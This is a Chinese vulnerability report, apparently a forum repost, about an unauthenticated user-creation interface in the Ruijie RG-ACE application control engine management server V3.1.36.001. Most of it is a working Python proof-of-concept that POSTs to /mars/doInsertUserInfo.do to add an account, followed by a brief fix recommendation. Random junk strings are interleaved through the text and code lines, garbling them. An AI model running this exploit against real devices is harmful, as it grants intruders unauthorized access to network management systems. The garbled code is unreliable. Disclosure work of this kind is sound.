锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
$ k) ?1 w0 D1 h, D  R

+ C: ^/ q0 {$ O# c8 S0 J+ ?& S测试的具体版本是
& X* m, A. A7 Z产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
. ?0 W+ M4 F1 A5 L) j7 y编译时间: 201104291730

3 h. h) w( L+ c2 J9 f# u  r2 c
漏洞证明：
6 p& S1 \( |& b, ?" W% ?

0 H$ Z- X" R5 I$ n8 I/ [; B


% u0 a" ^# I$ Y3 h; j$ @# r
执行脚本
6 Y( V/ J: O& @#! /usr/bin/env python
, ?  c. j1 ]5 w6 P" U) n! }. a#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
# _' E. W! b( d5 a( L1 Aimport urllib2, urllib,cookielib
, B( Q: C! ~1 v2 kurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
# p* h( `, R, I7 I# Jpost=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
("useropermanager","userManager"),
0 w! J6 q' V! U' P+ H("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
/ P8 t* e  q5 b% o" g8 q("trueName","ad"),
: D" B  F  c1 z& t" O4 I" p("email",""),
; K* ?/ w, T' P; j/ @7 O/ `("mobilePhone",""),
("officePhone",""),
# W3 I4 h+ o2 K& u5 L("addr",""),
("submit","确定"))
urllib2.install_opener(opener)
" S0 h. Z( D) |; l8 h8 `p=urllib2.urlopen(url, urllib.urlencode(post)).read()
9 ?3 G& d) Z2 e0 Q* zprint "Done"

9 S1 n+ ^* l9 a& ?8 T, P, i) ~登录，连接设备

8 r* D# [, o& L. l
, j% m7 p# ~/ Q2 L" d% l

& y# [6 t/ ?$ o3 P( q
/ y; I  D0 R5 m1 R: s, J默认的管理员admin权限更大点
+ j& E) U. d) ]6 Z/ V- j



% }% s6 |) \1 x4 y' x. }
修复方案：
加强对接口的权限验证

7 g# h) i5 ]2 w7 S% \